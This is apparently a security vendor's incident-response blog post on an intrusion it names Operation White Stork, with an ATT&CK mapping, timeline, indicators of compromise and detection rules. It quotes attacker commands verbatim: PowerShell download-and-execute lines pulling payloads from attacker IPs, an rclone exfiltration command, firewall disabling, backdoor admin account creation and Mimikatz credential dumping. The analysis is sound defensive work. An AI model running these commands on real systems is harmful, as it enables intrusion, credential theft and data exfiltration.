Blog Post

Catching the White Stork in Flight

Executive Summary

  • Arista’s Awake Labs team responded to a cybersecurity incident with a campaign that has been active since at least October 2020, which we are labeling Operation White Stork.
  • This campaign utilized multiple techniques and tools including Cobalt Strike Beacon, the MetaSploit Framework, Mimikatz, SharpSploit and exfiltration using rclone.
  • Awake’s analysis showed that the attackers remotely authenticated to the customer’s VPN and externally facing remote desktop gateway using previously compromised credentials, coming in through Tor exit nodes.
  • Lateral movement was achieved primarily using Windows Remote Desktop (RDP) and PsExec.
  • This investigation demonstrates the importance of monitoring for exfiltration and lateral movement as well as hardening external access points for members of staff and contractors, particularly when many people are working remotely.

Operation White Stork

In this post we break down several aspects of this operation, including:

  • Industries and Geography
  • Tactics and Techniques
  • Investigation and Technical Analysis
  • Indicators of Compromise (IOCs)
  • Detecting the Techniques

Industries and Geographies

Awake’s analysis of this event shows that the actor appears to have specifically targeted an organization in the industrial gas sector.

The locations of the attack were isolated to the United States. However, the attackers downloaded an attacker toolset with a Russian name (sborka5.zip – ‘sborka’ translates from Russian to ‘assembly’ in English) from the Russian site wdfiles[.]ru and exfiltrated data to a server hosted in Lithuania.

Tactics and Techniques

The investigation identified several tactics and techniques across the MITRE ATT&CK Framework used by the threat actor. These are detailed below.

ATT&CK TacticTechniques
Initial Access (TA0001)T1133 – External Remote Services
T1078 – Valid Accounts
Execution (TA0002)T1059.001 – PowerShell
T1569.002 – Service Execution
Credential Access (TA0006)T1110 – Brute Force
T1003.001 – OS Credential Dumping: LSASS Memory
Discovery (TA0007)T1087.002 – Account Discovery: Domain Account
T1482 – Domain Trust Discovery
T1083 – File and Directory Discovery
T1046 – Network Service Scanning
T1135 – Network Share Discovery
Lateral Movement (TA0008)T1570 – Lateral Tool Transfer
T1021.001 – Remote Desktop Protocol
T1021.002 – SMB / Windows Admin Shares
Collection (TA0009)T1560.001 – Archive via Utility
T1119 – Automated Collection
T1039 – Data from Network Shared Drive
T1074.001 – Local Data Staging
T1074.002  Remote Data Staging
Exfiltration (TA0010)T1048 – Exfiltration Over Alternative Protocol

Incident Timeline and Technical Analysis

The incident was first detected around 160 days after the initial activity when Mimikatz was detected on an endpoint.

Incident Timeline Summary - Operation White Stork

Figure 1: Incident Timeline Summary

In total, the activity from the threat actor continued for more than 170 days before containment. Figure 1 provides a summary of each major stage of the incident, while additional technical details are described below.

The Awake Labs team’s forensic investigation revealed a timeline that begins with repeated failed attempts to connect to several key endpoints within the customer environment. These connections, using SMB, occurred from a source IP address within the VPN range. During this time two Windows Service creation events were observed which indicated malicious PowerShell code had been executed on one of the hosts, injecting a Meterpreter payload into memory.

Figure 2 shows the content of the Image Path field for the service named ‘gaZtYZWmtJFOorGy’ while Figure 3 shows the decoded, decompressed code:

Malicious code seen in Windows Service Image Path field- white stork

Figure 2: Malicious code seen in Windows Service Image Path fieldDecoded and decompressed base64 section - white stork

Figure 3: Decoded and decompressed base64 section taken from Figure 2

This second base64 encoded string was decoded and found to contain additional code containing the following command:

powershell.exe -nop -c IEX ((new-object net.webclient).downloadstring('hxxp[://]45[.]146[.]164[.]193:8712/awq'))

This file was no longer present when the incident response team tried to retrieve it.

Additional analysis of the code showed thread injection into C:\Windows\System32\ntvdm.exe.

The code in the Image Path of the second Windows Service event referenced previously was very similar, and had the Service name: ‘vrzvySWAmvRsgZCh’.

The attacker then logged into the same system via RDP, using an administrative account, with the source IP again coming from the VPN pool. Minutes after this connection, a zip archive named sborka5.zip was downloaded from hxxps[://]wdfiles[.]ru. This archive contained many tools, such as those typically used for reconnaissance activity and lateral movement (Mimikatz, AdFind, NetScan, PsExec) as well as exploit tools such as those related to Eternal Blue. Interestingly, ‘sborka’ in Russian translates to ‘assembly’ in English. Not all of these tools were used by the attackers, but it was noteworthy to see them all hosted together in one place.

Following this, the execution of Mimikatz was logged and the file sek.log was created. This file was recovered and found to be a dump of credentials, created using Mimikatz.

Shortly after this, a different administrative account was used to log in to the same system via RDP, once again originating from an IP address in the VPN range. The attacker then used RDP to move laterally, and once again a zip archive named ‘sborka5.zip’ was downloaded from the same domain as earlier. This was followed by the execution of adfind.bat (see Figure 4) and netscanner64.exe, from within that toolset.

contents of adfind.bat- operation white stork

Figure 4: Screenshot of the contents of adfind.bat

As you can see, such information can give the threat actor a lot of information about the domain infrastructure. Each of the output files referenced in Figure 4, other than ad.7z, were found on the system during the incident response process.

The actor then leveraged an administrative user account to move laterally to a domain controller via RDP and execute adfind.bat and netscan64.exe and then disconnected their session.

The threat actor then appeared to lay low for more than a month before leveraging the previous compromised credentials to connect directly to a domain controller via RDP. Once again the access originated from an IP address within the VPN range. During this session, the file lsass.dmp was created in the user’s AppData\Local\Temp\8\ directory. Loading this file into WinDBG confirmed it was a dump of the lsass.exe process:

WinDBG analysis- white stork

Figure 5: WinDBG analysis of the lsass.dmp file indicated this was a dump of the lsass.exe process

There was then no other evidence of attacker activity for almost two months until logon activity towards several key servers and workstations was observed in the analysed logs. These logons once again originated from IP addresses within the VPN range. The file c:\programdata\rundll32.dll was created on several systems. These instances were launched using the rundll32.exe utility with the command line:

C:\ProgramData\rundll32.dll vvsection

The attackers then used PsExec to push and execute this DLL on remote systems. This was found to be a Cobalt Strike binary. Analysis showed it attempting to connect to the following URLs:

  • hxxps[://]newodi[.]com:443/wp-includes/temp.ico
  • hxxps[://]newodi[.]com:443/faq.js?restart=false

This domain resolved to IP address: 23[.]81[.]246[.]123, which, as you will see later, was involved in a clear beaconing pattern.

The attacker continued using RDP to connect to key servers via the VPN and push and execute the Cobalt Strike DLL on multiple systems.

At one point the actor launched the Windows Password Recovery tool and procdump.exe from the c:\perflogs directory. Shortly after this, the Cobalt Strike instance that had been running on one system spawned an instance of cmd.exe and attempted to map a shared drive with the command:

net use \\<ipaddress>\c$

About a week later, analysis showed lateral movement via RDP between systems, and the threat actor used an administrative account to launch another PowerShell script to pull down a second stage payload:

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('hxxp[://]194[.]611[.]53[.]10:80/a213'))"

Following this, the file csharp-streamer.exe was executed from the same user’s \AppData\Local\Temp\6\ directory. This was found to be a version of SharpSploit (a post exploitation library written in C#).

Following this activity, another malicious PowerShell command (shown below) was executed using a different administrative user account. Note, the IP address in this command was found to be related to Cobalt Strike activity observed elsewhere during the incident.

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('hxxp[://]89[.]238[.]185[.]28:4151/a'))"

Investigation Tip:

The above PowerShell commands were pulled from the ConsoleHost_history.txt file from the users’ \AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine directories – a useful file to pull as part of any investigation. This file is of additional interest if the last modification time of the file lines up with malicious activity. In our case it did, and these were the only commands in the files.

The file winspool.drv was created in the same user’s AppData\Roaming\WinRAR\Version\ directory. This file was found to be the remote access tool RMS RAT.

Shortly after this, the same user logged into a remote desktop server via an externally facing gateway, accessible via a web interface, and the file Desktop.exe was executed. This file was found to be the remote access tool RMS RAT – the compressed parent of the RMS RAT instance referenced previously.

Following this, the file c:\perflogs\procdump64.exe was created on the system, and shortly after, ADRecon was launched by the same user via the PowerShell script C:\PerfLogs\obfs.ps1. Minutes later, there were two instances of PowerShell commands launching what appeared to be Cobalt Strike Beacon, one example is shown in Figure 6:

PowerShell event logs-operation white stork

Figure 6: Obfuscated code found in PowerShell event logs

The base64 decodes and decompresses to reveal the $DoIt function, which is indicative of Beacon, as shown in Figure 7:decoding the base64 encoded string- operation white stork

Figure 7: Decompressing and decoding the base64 encoded string in Figure 6

The remainder of the code contains shellcode that will be reflectively injected into process memory on the system as shown in Figure 8:

Encoded shellcode - operating white stork

Figure 8: Encoded shellcode that will be reflectively loaded into process memory

This was decoded and analysed and found to be reaching out to pull down hxxp[://]89[.]238[.]185[.]28/Rr5c – a file that was no longer live when the team attempted to retrieve it. The identified user agent was Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; LBBROWSER) (which can also be indicative of Metasploit). The process created and injected code into C:\Windows\system32\ntvdm.exe.

Shortly after this, attacker tools such as Advanced_IP_Scanner_2.5.3850.exe and Mimikatz were executed from the c:\support directory by the same user.

Approximately 30 minutes later, a different account was used to access another remote desktop server from the externally facing gateway and launch a PowerShell script that had exactly the same functionality as those in Figures 7 and 8. Following this, the same user moved laterally to a domain controller via RDP and created another lsass.dmp file.

Additional Windows Service creation events were also observed on one of the domain controllers which were indicative of Cobalt Strike:

Base64 encoded PowerShell - operation white stork

Figure 9: Base64 encoded PowerShell command being launched as a service

The Service name was 9dcbd6f.

Decoding this and analysing the shellcode, the Awake Labs team saw thread injection into C:\Windows\system32\ntvdm.exe. This time, rather than attempting to call back to a domain, the following named pipe was created: \\.\pipe\win_service_ohm5iYaaNoo7po7koaTi

Thanks to an excellent write up from CrowdStrike, we can see that this activity indicated the jump psexec_psh Cobalt Strike Beacon command had been used to establish an instance of Beacon remotely on this system.

In addition, the following Windows Service creation events indicated that Cobalt Strike Beacon had been pushed remotely to the same, plus one other, domain controller seconds later:

Service nameImage path
2a419f7\\127.0.0.1\ADMIN$\2a419f7.exe
891ae60\\127.0.0.1\ADMIN$\891ae60.exe
85ac374\\127.0.0.1\ADMIN$\85ac374.exe
d27ba3a\\127.0.0.1\ADMIN$\d27ba3a.exe
ef8d577\\127.0.0.1\ADMIN$\ef8d577.exe

These files were not recovered, but thanks to the same CrowdStrike article, we can see that this activity was indicative that the jump psexec Cobalt Strike Beacon command had been used to establish a Beacon remotely on this system.

In the same period, the attackers used RDP to access critical devices and move laterally, once again via the VPN. SharpSploit was run on another system, this time using a critical management account with administrative privileges. On the same day, the user executed C:\PerfLogs\x64.exe. When analysed, this was found to launch an instance of sethc.exe (Windows ‘Sticky Keys’ accessibility feature) in a suspended state, inject code into it, then exit, leaving sethc.exe running as an orphaned process. In addition, we could see that the process connected to datatransferdc[.]com over IPv6

(2606[:]4700[:]3037[:][:]ac43[:]8ca0).

A few days later, the Cobalt Strike Beacon processes (rundll32.dll) running on several systems started beaconing out to 23[.]81[.]246[.]123:443, approximately every 31 minutes.

On one of these systems, a legitimate version of sethc.exe spawned the process dfrgui.exe (Microsoft Disk Defragmentation process), which made several outbound network connections over the next few days:

Domain nameIP address
telemetry[.]distrib000[.]com172[.]67[.]193[.]215
stats[.]0293432094823904832048234[.]work172[.]67[.]223[.]63
ping[.]12093130987381731037123[.]work104[.]21[.]21[.]133
dash[.]92834298473247204972349234[.]work172[.]67[.]158[.]54
dns[.]09123312093812039813[.]work104[.]21[.]79[.]23
telemetry[.]distrib000[.]com104[.]21[.]76[.]117
stats[.]0293432094823904832048234[.]work104[.]21[.]25[.]63

Several hours later, the same dfrgui.exe process launched an instance of PowerShell that attempted to pull down another payload from the known malicious IP address shown below:

C:\Windows\system32\cmd.exe /C powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring(' hxxp[://]89[.]238[.]185[.]28/a'))"""

The process made several additional network connections:

Domain nameIP address
datatransferdc[.]com104[.]21[.]62[.]240
Not resolved172[.]67[.]140[.]160
Not resolved172[.]67[.]198[.]213
Not resolved172[.]67[.]168[.]181
Not resolved152[.]199[.]19[.]161
Not resolved52[.]178[.]182[.]73
Not resolved51[.]144[.]113[.]175
Not resolved93[.]184[.]220[.]29
Not resolved89[.]238[.]185[.]28

The final connection listed (89[.]238[.]185[.]28) was to port 50050, indicating this IP address is likely running Cobalt Strike Teamserver listening on its default port.

During this two day period of activity, the same process made connections to several internal IP addresses over port 3389, indicating further attempts to use RDP in an attempt to move laterally. For instance, on one of the systems that was connected to in this manner, the team observed several instances of the following commands:

  1. Disable the firewall:
netsh advfirewall set allprofiles state off

2. Download a malicious second stage payload from 89[.]238[.]185[.]28:

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('hxxp[://]89[.]238[.]185[.]28/a'))"

Shortly after this, rclone was invoked via Powershell to begin exfiltrating data on a file share to an SFTP server based in Lithuania:

PowerShell.exe -windowstyle hidden .\rclone copy --filter-from filter-file.txt <SHARE_LOCATION> conf2:<VICTIM_NAME> -q --ignore-existing --auto-confirm --multi-thread-streams 16 --transfers 16 -max-age 2y

The contents of the rclone configuration file are shown in Figure 10 below:

Rclone SFTP server configuration information - operation white storkFigure 10: Rclone SFTP server configuration information

The contents of filter-file.txt are shown in Figure 11 below:

rclone file filter - operation white stork

Figure 11: Filter file used to tell rclone which files to upload

A review of the firewall logs showed several gigabytes of data uploaded to the IP address 91[.]103[.]255[.]177 at this time.

The dfrgui.exe process continued to make internal network connections over port 3389, as well as outbound connections to 80[.]153[.]159[.]29 over port 3390, and 45[.]130[.]138[.]81 towards port 50050 indicating this was also likely related to Cobalt Strike.

At this point the Awake Labs team began taking actions to contain the incident and shut off the exfiltration while in process.

After the containment started, the firewall logs showed there were several attempts made to authenticate to the VPN from multiple users; which eventually proved successful. These connections all came from the same source: Tor exit node IP address 185[.]220[.]100[.]252 (AS205100 F3 Netze e.V. out of Germany.)

During this session, the actor successfully logged on to another server and created several files associated with Mimikatz and Tor, such as c:\users\<user>\downloads\mimidrv.zip and c:\users\<user>\desktop\tor.zip.

Shortly after this, the firewall logs showed the same user authenticated to the VPN from a known Tor exit node: 91[.]218[.]203[.]59. During this VPN session, several systems were logged into via RDP.

During these sessions, the user installed and ran Tor by creating and launching:

C:\Windows\System32\cmd.exe /C C:\Windows\System32\AppLocker\start.bat

Which in turn launched:

C:\Windows\System32\AppLocker\AppLocker.exe --service install -options -f C:\Windows\System32\AppLocker\torrc

Another lsass.dmp file was created in another compromised administrator account’s \appdata\local\temp\ directory. The file 12212.7z was created at the same time on the same user’s Desktop; neither file was recovered.

Containment and remediation measures were then put fully into place with ongoing monitoring. Since the containment was enacted, we are yet to see evidence of the threat actor’s return.

Conclusions and Recommendations

In this instance a threat actor was able to access the network through the VPN, move laterally via Windows Remote Desktop protocol and PsExec, download a toolset from a Russian file sharing site – which contained a vast array of attacker tools – install some backdoors, and from there were able to reach their target and begin to exfiltrate data.

Company staff are working remotely now more than ever. As a result, external access points are relied upon more and more for staff to carry out their work duties in the same efficient manner as if they were in the office. Awake Labs sees breaches where initial access is achieved through external access points (such as VPN or Remote Desktop Gateway) frequently. It is vital that measures are put in place to harden remote endpoints and exposed external infrastructure. Awake recommends the following items are enforced at a minimum:

  • Multi-Factor Authentication (MFA) for external access to any company resources (VPN, internal services, etc.).
  • A strong password policy, whereby passwords should meet a required minimum length; should contain a combination of upper and lower case letters, numbers and special characters; and should be changed regularly.
  • Regular user education on security and the risks of poor hygiene.
  • Remain up to date on vulnerability patching and mitigation for externally facing services.
  • Asset tracking and management of remote devices. Ensure any devices being used for work purposes are identifiable and have company standard security tools installed, are actively monitored and up to date (anti-virus, EDR, etc.).

Once an external user has authenticated to a VPN, it is important to make sure they can only access systems they need to access for business purposes. It is also important to only allow access between network segments that is required for business purposes. Ultimately, implementing a Zero Trust model is recommended.

Host based IOCs

Contents of sborka5.zip archive file (note some of these are not IOCs per se, but have been kept in for completeness):

File pathsha256 hashContents
ebbs.exe7f5f447fe870449a8245e7abc19b9f4071095e02813d5f42c622add56da15b8b
etw576sz.exee8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173
PsExec.exe3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef
Scanner.exea140e9a3ec3f600ef34e221997f93d70bde20b7dabcc72cf0d120e535a9638f7
AdFind/adcsv.plcb2c9da00ca544cfe3dddfa491cb97a7d6da8e3b00e17c00a78c13c47c0db8b6
AdFind/adfind.bat014db7075dc15953ade603627b5f990c79ae35c098129a99876705dc3dc20dd3See Figure 3
AdFind/AdFind.exec92c158d7c37fea795114fa6491fe5f145ad2f8c08776b18ae79db811e8e36a3
CVE-2019-1388-master/CVE-2019-1388-master/CVE-2019-1388.gif320af511385a1479ef2ef5e2fbc55ef58f83c1627c33c0d6a029fb54848fd30f
CVE-2019-1388-master/CVE-2019-1388-master/HHUPD.EXE0745633619afd654735ea99f32721e3865d8132917f30e292e3f9273977dc021
eternal/eternalblue.exee2cc26b8b38fab6799bd834b8284c1b921339f0133a606d1178c39a720d871c3
eternal/commands.txtd60097e359ac0c98034cc2875c00f5d4f32d2c46ec8d420d82dadd8473cb3eb3

cmd /c net user petr 2k3X8X57 /add

cmd /c net localgroup administrators petr /add

lpe/runsysO.cr6516bbd99089964e121bab9d448cce19a991aeaf4cbfca4fa1bc7a2357d1948c
mimikatz_trunk/kiwi_passwords.yar966a58176b30c9bd5d4abfee0690e454129296e5522bbcf5f3c9db7fc84e279e
mimikatz_trunk/lsadump.bat750aa70ef96cdae1d3a7be92a022b1b3522bdf5a1ff777bf9f7c9af39c53cc21

mimikatz # privilege::debug

mimikatz # inject::process lsass.exe sekurlsa.dll

mimikatz # @getLogonPasswords

 

 

mimikatz_trunk/mimicom.idl51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df
mimikatz_trunk/README.md56e362b25b365ab16793f15c29f5f05ac6a38a4bfc3d2b38b3a1fcc060b12deb
mimikatz_trunk/sekurlsa.bat80a025a8548b8272ab91b9aabdc1a742dfe0e7cb123f1fb3f0e897f054257348

@echo off

mimikatz privilege::debug sekurlsa::logonPasswords exit > c.txt

netscan_portable/netscan32.exe572d88c419c6ae75aeb784ceab327d040cb589903d6285bbffa77338111af14b
netscan_portable/netscan64.exebb574434925e26514b0daf56b45163e4c32b5fc52a1484854b315f40fd8ff8d2

Other host based IOCs:

IndicatorIndicator typeDescription
gaZtYZWmtJFOorGyService nameService name for injecting meterpreter shellcode – note this is changeable but provided for reference
vrzvySWAmvRsgZChService nameService name for injecting meterpreter shellcode – note this is changeable but provided for reference
%comspec%Service image pathIndication that a service is launching a command prompt. Seeing a service Image Path start with this is suspicious
sborka5.zipFilenameArchive containing attacker tools and files
sek.logFilenameMimikatz output
ad_users.txtFilenameOutput from adfind.exe
ad_computers.txtFilenameOutput from adfind.exe
ad_ous.txtFilenameOutput from adfind.exe
ad_subnets.txtFilenameOutput from adfind.exe
ad_group.txtFilenameOutput from adfind.exe
ad_trustdmp.txtFilenameOutput from adfind.exe
ad.7zFilenameArchive containing adfind output files
lsass.dmpFilenameDump of lsass.exe process
AppData\Local\Temp\<num>\File pathStaging directory
c:\programdata\rundll32.dllFile pathCobalt Strike
82900aea8a8617f0d49e1c036d1bc23cc768e71b746a0ee5d2bf5cbf43841768Sha256 hashCobalt Strike (rundll32.dll)
rundll32.exe C:\ProgramData\rundll32.dll vvsectionCommand line argumentCommand line argument to launch Cobalt Strike DLL
C:\perflogs\File pathStaging directory used by attackers
procdump.exeFilenameTool for dumping process memory
WPR.exeFilenameWindows Password Recovery tool
net use \\<ipaddress>\c$Command line argumentCommand used by attacker to map shared drives
csharp-streamer.exeFilenameVersion of SharpSploit post exploitation tool kit
ad5c06b52b468711f4f1ce1bf6957506b805b07e52c9be331035536672505160Sha256 hashVersion of SharpSploit post exploitation tool kit
cd43f4c2f4590e1993991b5f7c890919cd0bb6b378c222c21a7ce956759c8a94Sha256 hashRMS RAT
6184e4c8915a3924a9a12e26c42cffef35a1d1380a8c0a236ef65df71b20c217Sha256 hashRMS RAT
C:\PerfLogs\obfs.ps1File pathPowerShell script used to launch ADRecon
C:\support\File pathStaging directory
Service name with 7, apparently random alphanumeric charactersService nameIndicative of Cobalt Strike, example: 2a419f7
\\127.0.0.1\ADMIN$\<7 alphanumeric chars>.exeService Image Path

Indicative of Cobalt Strike, example:

\\127.0.0.1\ADMIN$\2a419f7.exe

C:\PerfLogs\x64.exeFile pathCobalt Strike
53031ae7cdd8627c57f341934290e96b757b38beab29ce847fc09140e29349abSha256 hashCobalt Strike
rclone.exeFilenameUsed to exfiltrate data
fc03b8c51889be55b73a02efe02f59eb2836e63f5f032aa00dd611ff07e76d0csha256 hashSha256 hash of rclone.exe
filter-file.txtFilenameFilter file used by rclone
mimidrv.zipFilenameMimikatz
C:\Windows\System32\AppLocker\start.batFile pathBatch script used to start Tor
C:\Windows\System32\AppLocker\torrcFile pathTor configuration file
12212.7zFilenameArchive file – unrecovered
advanced_IP_Scanner_2.5.3850.exeFilenameReconnaissance tool
loader.exeFilenameComponent of Windows Password Recovery service
loader64.exeFilenameComponent of Windows Password Recovery service

Network IOCs

IndicatorIndicator typeDescription
hxxps[://]wdfiles[.]ruDomainStaged attacker tools
hxxps[://]newodi[.]comDomainCobalt Strike
hxxps[://]newodi[.]com:443/wp-includes/temp.icoURLCobalt Strike
hxxps[://]newodi[.]com:443/faq.js?restart=falseURLCobalt Strike
23[.]81[.]246[.]123IPv4Cobalt Strike
hxxp[://]194[.]61[.]53[.]10:80/a213URLSecond stage payload
194[.]61[.]53[.]10IPv4IP address hosting second stage payload
89[.]238[.]185[.]28IPv4IP address associated with second stage payload
hxxp[://]89[.]238[.]185[.]28/aURLSecond stage payload
hxxp[://]89[.]238[.]185[.]28:4151/aURLSecond stage payload
hxxp[://]89[.]238[.]185[.]28/Rr5cURLSecond stage payload
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; LBBROWSER)User agentIndicative of Metasploit
45[.]146[.]164[.]193IPv4IP reached out to by Meterpreter to pull down second stage payload and inject it into memory
hxxp[://]45[.]146[.]164[.]193:8712/awqURLSecond stage payload
\\.\pipe\win_service_ohm5iYaaNoo7po7koaTiNamed pipeCobalt Strike
telemetry[.]distrib000[.]comDomainConnected to by malicious instance of dfrgui.exe
stats[.]0293432094823904832048234[.]workDomainConnected to by malicious instance of dfrgui.exe
ping[.]12093130987381731037123[.]workDomainConnected to by malicious instance of dfrgui.exe
dash[.]92834298473247204972349234[.]workDomainConnected to by malicious instance of dfrgui.exe
dns[.]09123312093812039813[.]workDomainConnected to by malicious instance of dfrgui.exe
datatransferdc[.]comDomainConnected to by malicious instance of dfrgui.exe
2606[:]4700[:]3037[:][:]ac43[:]8ca0IPv6IPv6 address used by malware to connect to datatransferdc[.]com
172[.]67[.]193[.]215IPv4Connected to by malicious instance of dfrgui.exe
172[.]67[.]223[.]63IPv4Connected to by malicious instance of dfrgui.exe
104[.]21[.]21[.]133IPv4Connected to by malicious instance of dfrgui.exe
172[.]67[.]158[.]54IPv4Connected to by malicious instance of dfrgui.exe
104[.]21[.]79[.]23IPv4Connected to by malicious instance of dfrgui.exe
104[.]21[.]76[.]117IPv4Connected to by malicious instance of dfrgui.exe
104[.]21[.]62[.]240IPv4Connected to by malicious instance of dfrgui.exe
172[.]67[.]140[.]160IPv4Connected to by malicious instance of dfrgui.exe
172[.]67[.]198[.]213IPv4Connected to by malicious instance of dfrgui.exe
172[.]67[.]168[.]181IPv4Connected to by malicious instance of dfrgui.exe
52[.]178[.]182[.]73IPv4Connected to by malicious instance of dfrgui.exe
51[.]144[.]113[.]175IPv4Connected to by malicious instance of dfrgui.exe
50050PortDefault Cobalt Strike TeamServer port
91[.]103[.]255[.]177IPv4SFTP server used for exfiltration
80[.]153[.]159[.]29IPv4Connected to by malicious instance of dfrgui.exe (resolves to p50999f1d[.]dip0[.]t-ipconnect[.]de)
45[.]130[.]138[.]81IPv4Connected to by malicious instance of dfrgui.exe – connection made using default Cobalt Strike TeamServer port

Detecting the Techniques

PlatformDetection
Carbon Black Cloud
  • The application rclone.exe was detected running
  • A known virus (Trojan: RMS) was detected
  • A known virus (PUP: GenericKD) was detected running.
  • A known virus (Trojan: MS17) was detected.
  • A known virus (PWS: Mimikatz) was detected.
  • A known virus (Trojan: Meterpreter) was detected.
  • Watchlist query: ((process_cmdline:rundll32.dll) OR (process_cmdline:comspec))
Awake Security Platform
  • Lateral Movement: PsExec Like Activity
  • Lateral Movement and Execution: Remote Command Execution (psexec, cobalt strike, metasploit, others)
  • Exfiltration: External FTP Upload
  • Compliance: SSH Upload Direct To IP

By Kieran Evans and Jason Bevis

Subscribe!

If you liked what you just read, subscribe to hear about our threat research and security analysis.

Kieran Evans
Kieran Evans

Threat Hunting and Incident Response Specialist